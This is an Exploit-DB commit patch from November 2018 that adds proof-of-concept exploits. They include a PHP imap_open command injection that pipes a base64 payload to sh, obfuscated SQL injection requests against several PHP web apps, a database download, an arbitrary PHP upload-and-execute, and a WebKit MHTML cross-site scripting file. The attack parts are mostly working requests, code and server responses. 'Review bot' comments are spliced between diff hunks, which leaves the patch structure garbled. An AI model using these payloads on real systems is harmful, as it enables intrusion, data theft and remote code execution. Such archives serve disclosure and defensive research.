From 268e737bb6d13a14ed946435369e97d53a822ab9 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 16 Nov 2018 05:01:40 +0000 Subject: [PATCH] DB: 2018-11-16 21 changes to exploits/shellcodes Notepad3 1.0.2.350 - Denial of Service (PoC) PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass PHP 5.x COM - Safe Mode / Disable Functions Bypass VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Privilege Escalation Libuser - 'roothelper' Privilege Escalation (Metasploit) Libuser - 'roothelper' Local Privilege Escalation (Metasploit) Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit) Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit) Sun Solaris 11.3 AVS - Local Kernel root Exploit Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass Webkit (Safari) - Universal Cross-site Scripting Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting PHP < 5.6.2 - 'Shellshock' 'disable_functions()' Bypass Command Injection PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library PHP Imagick 3.3.0 - disable_functions Bypass Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass Precurio Intranet Portal 2.0 - Cross-Site 
Request Forgery (Add Admin) PHP-Proxy 5.1.0 - Local File Inclusion BitZoom 1.0 - 'rollno' SQL Injection Net-Billetterie 2.9 - 'login' SQL Injection Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection EverSync 0.5 - Arbitrary File Download Meneame English Pligg 5.8 - 'search' SQL Injection Kordil EDMS 2.2.60rc3 - Arbitrary File Upload Simple E-Document 1.31 - 'username' SQL Injection 2-Plan Team 1.0.4 - Arbitrary File Upload PHP Mass Mail 1.0 - Arbitrary File Upload Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting --- exploits/hardware/dos/38475.txt | 2 +- exploits/linux/local/45865.php | 7 ++ exploits/multiple/local/45866.html | 23 ++++ exploits/multiple/local/45867.txt | 36 +++++++ exploits/multiple/remote/36839.py | 2 +- exploits/php/webapps/38127.php | 3 +- exploits/php/webapps/45860.txt | 87 +++++++++++++++ exploits/php/webapps/45861.txt | 47 ++++++++ exploits/php/webapps/45862.txt | 87 +++++++++++++++ exploits/php/webapps/45863.txt | 61 +++++++++++ exploits/php/webapps/45864.txt | 41 +++++++ exploits/php/webapps/45868.txt | 35 ++++++ exploits/php/webapps/45875.txt | 30 ++++++ exploits/php/webapps/45876.txt | 153 +++++++++++++++++++++++++++ exploits/php/webapps/45877.txt | 48 +++++++++ exploits/php/webapps/45878.txt | 84 +++++++++++++++ exploits/php/webapps/45879.txt | 69 ++++++++++++ exploits/php/webapps/45880.txt | 29 +++++ exploits/windows/local/39666.txt | 2 +- exploits/windows/local/40823.txt | 2 +- exploits/windows_x86-64/dos/45869.py | 29 +++++ files_exploits.csv | 38 +++++-- 22 files changed, 899 insertions(+), 16 deletions(-) create mode 100644 exploits/linux/local/45865.php create mode 100644 exploits/multiple/local/45866.html create mode 100644 exploits/multiple/local/45867.txt create mode 100644 exploits/php/webapps/45860.txt create mode 100644 exploits/php/webapps/45861.txt create mode 100644 exploits/php/webapps/45862.txt create mode 100644 exploits/php/webapps/45863.txt create mode 100644 exploits/php/webapps/45864.txt create mode 100644 
exploits/php/webapps/45868.txt create mode 100644 exploits/php/webapps/45875.txt create mode 100644 exploits/php/webapps/45876.txt create mode 100644 exploits/php/webapps/45877.txt create mode 100644 exploits/php/webapps/45878.txt create mode 100644 exploits/php/webapps/45879.txt create mode 100644 exploits/php/webapps/45880.txt create mode 100755 exploits/windows_x86-64/dos/45869.py diff --git a/exploits/hardware/dos/38475.txt b/exploits/hardware/dos/38475.txt index a999d705e..a0116e8e5 100644 --- a/exploits/hardware/dos/38475.txt +++ b/exploits/hardware/dos/38475.txt @@ -13,7 +13,7 @@ Reported: Public release: Author: Lyon Yang -Paper: https://www.exploit-db.com/docs/39658.pdf +Paper: https://www.exploit-db.com/docs/english/39658-exploiting-buffer-overflows-on-mips-architecture.pdf Summary: -------- diff --git a/exploits/linux/local/45865.php b/exploits/linux/local/45865.php new file mode 100644 index 000000000..467668b5b --- /dev/null +++ b/exploits/linux/local/45865.php @@ -0,0 +1,7 @@ +/tmp/test0001 + +$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}"; + +imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error()); \ No newline at end of file diff --git a/exploits/multiple/local/45866.html b/exploits/multiple/local/45866.html new file mode 100644 index 000000000..ada77a11a --- /dev/null +++ b/exploits/multiple/local/45866.html @@ -0,0 +1,23 @@ + + + +hello + \ No newline at end of file diff --git a/exploits/multiple/local/45867.txt b/exploits/multiple/local/45867.txt new file mode 100644 index 000000000..b41758839 --- /dev/null +++ b/exploits/multiple/local/45867.txt 
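Review bot: The new file carries none of the header fields the other entries in this commit have (Exploit Title, Date, Exploit Author, Tested on, CVE), unless they were lost in rendering, so a reader cannot tell which PHP builds are affected or what a successful run looks like. A comment block at the top should say that the PoC only writes a marker to `/tmp/test0001`, that it works because the mailbox host string reaches the ssh helper unfiltered (the `-oProxyCommand=` inside `$server` is the whole mechanism), and that patched PHP builds keep this path closed unless the `imap.enable_insecure_rsh` INI option is turned on, which is the setting a defender should verify. The `\ No newline at end of file` marker shows the file also lacks a trailing newline, unlike the sibling .txt entries.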
@@ -0,0 +1,36 @@ + + + + + +MIME-Version: 1.0 +Content-Type: multipart/related; + type="text/html"; + boundary="----MultipartBoundary--" +CVE-2017-5124 + +------MultipartBoundary-- +Content-Type: application/xml; + + + + +]> + + + + + + +------MultipartBoundary-- +Content-Type: text/html +Content-Location: https://google.com + + +------MultipartBoundary---- \ No newline at end of file diff --git a/exploits/multiple/remote/36839.py b/exploits/multiple/remote/36839.py index 9c6087db6..f81f5344e 100755 --- a/exploits/multiple/remote/36839.py +++ b/exploits/multiple/remote/36839.py @@ -9,7 +9,7 @@ # Tested on: AirTies RT-204v3 # CVE : 2013-0230 # Exploit gives a reverse shell to lhost:lport -# Details: https://www.exploit-db.com/docs/36806.pdf +# Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf import urllib2 from string import join diff --git a/exploits/php/webapps/38127.php b/exploits/php/webapps/38127.php index 54eb97a4b..b07682923 100644 --- a/exploits/php/webapps/38127.php +++ b/exploits/php/webapps/38127.php @@ -1,5 +1,6 @@ + +
+ + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45861.txt b/exploits/php/webapps/45861.txt new file mode 100644 index 000000000..c5d221526 --- /dev/null +++ b/exploits/php/webapps/45861.txt @@ -0,0 +1,47 @@ +# Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion +# Date: 2018-11-13 +# Exploit Author: Ameer Pornillos +# Contact: https://ethicalhackers.club +# Vendor Homepage: https://www.php-proxy.com/ +# Software Link: https://www.php-proxy.com/download/php-proxy.zip +# Version: 5.1.0 +# Category: Webapps +# Tested on: XAMPP on Win10_x64 +# Description: Downloadable pre-installed version of PHP-Proxy 5.1.0 +# make use of a default app_key wherein can be used for local file inclusion +# attacks. This can be used to generate encrypted string which +# can gain access to arbitrary local files in the server. +# http://php-proxy-site/index.php?q=[encrypted_string_value] +# CVE: CVE-2018-19246 + +# POC: +# 1) +# Generate encrypted string value using the PHP script below +# 2) +# Browse to URL +# http://php-proxy-site/index.php?q=[encrypted_string_value] +# to read local file + + \ No newline at end of file diff --git a/exploits/php/webapps/45862.txt b/exploits/php/webapps/45862.txt new file mode 100644 index 000000000..cfb9b8af4 --- /dev/null +++ b/exploits/php/webapps/45862.txt 
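Review bot: The description states the root cause (a shipped default app_key) but never the remediation, and the "PHP script below" that POC step 1) refers to is not present in the rendered hunk, so the entry is neither reproducible nor actionable as it stands. A line such as `# Fix: replace the default app_key with a unique per-install value; the encrypted q= string is derived from that key, as the description notes` would let an operator act on the entry without replaying it. The header gives `# Version: 5.1.0` but does not say whether a fixed release exists; if none is known, say so explicitly.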
@@ -0,0 +1,87 @@ +# Exploit Title: BitZoom 1.0 - 'rollno' SQL Injection +# Dork: N/A +# Date: 2018-11-14 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://bitzoom.sourceforge.io/ +# Software Link: https://excellmedia.dl.sourceforge.net/project/bitzoom/bitzoom-master.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/forgot.php +# +POST /PATH/forgot.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=rsq0813q4hl4dtbfesogugiln3 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 572 +rollno=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2d%2d%20%2d +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 11:17:49 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 2488 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/forgot.php +# +POST /PATH/forgot.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=rsq0813q4hl4dtbfesogugiln3 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 574 +username=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2d%2d%20%2d +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 11:17:52 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 2486 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/login.php +# +POST /PATH/login.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 592 
+username=%31%32%27%7c%28%53%65%6c%65%43%54%20%27%45%66%65%27%20%46%72%6f%4d%20%64%75%41%4c%20%57%68%65%52%45%20%31%31%30%3d%31%31%30%20%41%6e%44%20%28%73%65%4c%45%63%54%20%31%31%32%20%66%72%4f%4d%28%53%45%6c%65%63%54%20%43%6f%75%4e%54%28%2a%29%2c%43%6f%6e%43%41%54%28%44%41%54%41%42%41%53%45%28%29%2c%28%53%65%4c%45%63%74%20%28%45%4c%54%28%31%31%32%3d%31%31%32%2c%31%29%29%29%2c%46%4c%6f%6f%52%28%52%41%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%72%6d%61%74%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%6c%75%47%49%4e%53%20%67%72%4f%55%70%20%42%59%20%78%29%61%29%29%7c%27&password=Efe +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 11:03:08 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 585 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45863.txt b/exploits/php/webapps/45863.txt new file mode 100644 index 000000000..182f6f327 --- /dev/null +++ b/exploits/php/webapps/45863.txt 
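Review bot: The title names only 'rollno', but POC 2) and POC 3) send the injection through `username` on forgot.php and login.php respectively, so the entry under-reports the affected parameters compared with the sibling entries in this commit that name each one. Either list all of them in the title or add `# Parameters: rollno, username (forgot.php); username (login.php)` to the header. Unlike 45863.txt and 45877.txt in the same commit, no source excerpt of the vulnerable query is included, so a reader cannot confirm the sink or judge the fix; a few lines around the query would make the finding verifiable.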
@@ -0,0 +1,61 @@ +# Exploit Title: Net-Billetterie 2.9 - 'login' SQL Injection +# Dork: N/A +# Date: 2018-11-13 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://net-billetterie.tuxfamily.org/ +# Software Link: https://netix.dl.sourceforge.net/project/netbilletterie/Netbilletterie2.9.zip +# Version: 2.9 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/login.inc.php +# + +# //login.inc.php +# .... +#18 if (isset ($_POST) && !empty($_POST['login']) && !empty($_POST['pass'])) +#19 { +#20 extract($_POST); +#21 $pass=md5($pass); +#22 +#23 $sql="SELECT * FROM ".$tblpref."user WHERE login='$login' AND pwd='$pass' "; +#24 $req=mysql_query($sql) or die (mysql_error()); +#25 if( mysql_num_rows($req)>0) +#26 { +#27 $data = mysql_fetch_array($req); +#28 $login = $data['login']; +#29 $num=$data['num']; +#30 +#31 $_SESSION['Auth']=array( +#32 'login' =>$login, +#33 'pass' =>$pass, +#34 'lang' =>'fr', +#35 'tblpref'=>$tblpref, +#36 'num' =>$num +# .... 
+ +POST /[PATH]/login.inc.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=ahn0q4qtr7adcj7kol54879rv0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 579 +login=%31%27%20%4f%52%20%28%53%45%4c%45%43%54%20%31%31%32%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%32%3d%31%31%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20Efe&pass=Efe +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 10:57:05 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 84 +Keep-Alive: timeout=5, max=97 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45864.txt b/exploits/php/webapps/45864.txt new file mode 100644 index 000000000..bb61a86d2 --- /dev/null +++ b/exploits/php/webapps/45864.txt 
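Review bot: The excerpt at #20 shows `extract($_POST)` immediately before the string-built query at #23, and the description does not comment on it: any POST field can shadow locals such as `$tblpref`, which the same query uses and which #35 stores into the session, so a fix that only escapes `$login` is incomplete. The entry should state that the remediation is bound parameters for the query plus removal of the `extract()` call. The response shows only `Content-Length: 84`; say what in the body demonstrated the injection so the result can be checked.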
@@ -0,0 +1,41 @@
+# Exploit Title: Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection
+# Dork: N/A
+# Date: 2018-11-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://galaxy.alyx.pl/
+# Software Link: https://excellmedia.dl.sourceforge.net/project/galaxyforces/galaxy/0.5.8/galaxy-0.5.8.7z
+# Version: 0.5.8
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# Users..
+# http://localhost/[PATH]/ads.php
+#
+# action=add&title=[Do not leave empty..]&type=[SQL]&time=[Do not leave empty..]&message=[Do not leave empty..]
+#
+POST /PATH/ads.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: RID=d3fada0e6d425fdf; login=efe; salt=b5c59c9626445d978940049594f60c858642d268; agree=true
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 368
+action=add&title=[Efe]&type=%27%7c%7c(SeleCT%20'%45%66%65'%20FroM%20duAL%20WheRE%20110%3d110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT%28%31%31%32%3d%31%31%32%2c%31%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))%7c%7c%27&time=[Efe]&message=[Efe]
+HTTP/1.1 302 Found
+Date: Wed, 14 Nov 2018 15:12:30 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: RID=44ff5c8a0c395f9b; expires=Wed, 14-Nov-2018 16:12:30 GMT; Max-Age=3600
+Set-Cookie: login=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
+Set-Cookie: salt=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
+Content-Length: 0
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+#Etc..
\ No newline at end of file
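Review bot: The transcript does not show the injection succeeding: the response is `302 Found` with `Content-Length: 0` and it expires the `login` and `salt` cookies, which reads like the server rejecting the session rather than evaluating the query. The entry should state how the result was observed (the database error the payload is built to surface, or the redirect target), or the request should be re-captured with a valid session. The `# Users..` line presumably means a logged-in account is required; say so explicitly, as it changes the severity of the finding.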
diff --git a/exploits/php/webapps/45868.txt b/exploits/php/webapps/45868.txt
new file mode 100644
index 000000000..fa1cc416b
--- /dev/null
+++ b/exploits/php/webapps/45868.txt
@@ -0,0 +1,35 @@
+# Exploit Title: EverSync 0.5 - Arbitrary File Download
+# Dork: N/A
+# Date: 2018-11-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://phpmassmail.sourceforge.io/
+# Software Link: https://datapacket.dl.sourceforge.net/project/eversync/Downloads/alpha/EverSync-Pre-alpha05.zip
+# Version: 0.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: Dztabase Download
+# 1)
+# http://localhost/[PATH]/files/db.sq3
+#
+
+GET /[PATH]/files/db.sq3 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=dhq0fbvco8d0sc0lem3l2kktk0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Wed, 14 Nov 2018 19:47:32 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+Last-Modified: Wed, 14 Nov 2018 19:37:00 GMT
+ETag: "3800-57aa50ed0a29c"
+Accept-Ranges: bytes
+Content-Length: 14336
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
\ No newline at end of file
diff --git a/exploits/php/webapps/45875.txt b/exploits/php/webapps/45875.txt
new file mode 100644
index 000000000..1d9495453
--- /dev/null
+++ b/exploits/php/webapps/45875.txt
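Review bot: The `# Vendor Homepage:` line points at `https://phpmassmail.sourceforge.io/`, which is the PHP Mass Mail project from 45879.txt in this same commit, not EverSync; only the Software Link is correct, so the homepage should be replaced with the EverSync project page. `Dztabase` in the POC heading is a typo for `Database`. The title says Arbitrary File Download, but the request fetches one fixed path, `files/db.sq3`, with no parameter, so the finding is an SQLite database left readable inside the web root; naming it that way, and noting that the fix is to keep the database outside the document root or deny web access to `files/`, would be more useful than the generic title.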
@@ -0,0 +1,30 @@
+# Exploit Title: Meneame English Pligg 5.8 - 'search' SQL Injection
+# Dork: N/A
+# Date: 2018-11-13
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://sourceforge.net/projects/meneame-english/
+# Software Link: https://master.dl.sourceforge.net/project/meneame/meneame/Beta%205.8/Pligg_Beta_5.8.rar
+# Version: 5.8
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# http://localhost/[PATH]/index.php?search=[SQL]
+#
+GET /[PATH]/?search=%61%27%29%20%41%4e%44%20(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))%20--%20Efe HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 13 Nov 2018 15:10:50 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Content-Length: 7044
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45876.txt b/exploits/php/webapps/45876.txt
new file mode 100644
index 000000000..ed3c1575f
--- /dev/null
+++ b/exploits/php/webapps/45876.txt
@@ -0,0 +1,153 @@ +# Exploit Title: Kordil EDMS 2.2.60rc3 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-11-13 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.kordil.net/ +# Software Link: https://vorboss.dl.sourceforge.net/project/kordiledms/Kordil%20EDMS%20v2.2.60rc3/kordil_edms_installer.exe +# Version: 2.2.60rc3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# Users... +# 1) +# http://localhost/[PATH]/routine_emails_to_all_users_add.php +# +POST /[PATH]/routine_emails_to_all_users_add.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------114917121519378418451544589507 +Content-Length: 973 +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="add_fd1" +admin +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="add_fd2" +Efe +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="add_fd3" +2018-11-13 15:04:48 +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="upload_fd4"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="add_fd5" +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="act" +n +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="QS_Submit" +Add +-----------------------------114917121519378418451544589507-- +HTTP/1.1 302 Found +Date: Tue, 13 Nov 2018 12:15:22 GMT +Server: 
Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9 +X-Powered-By: PHP/5.2.9 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: ./routine_emails_to_all_users.php? +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html + +GET /PATH/email_attachment/admin-13.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/[PATH]/routine_emails_to_all_users.php? +Cookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 12:15:30 GMT +Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9 +X-Powered-By: PHP/5.2.9 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html + +# POC: +# 2) +# http://localhost/[PATH]/routine_emails_to_all_users_add.php +# +# http://localhost/[PATH]/email_attachment//[FILE] +# + + +
+ + + + + + + +
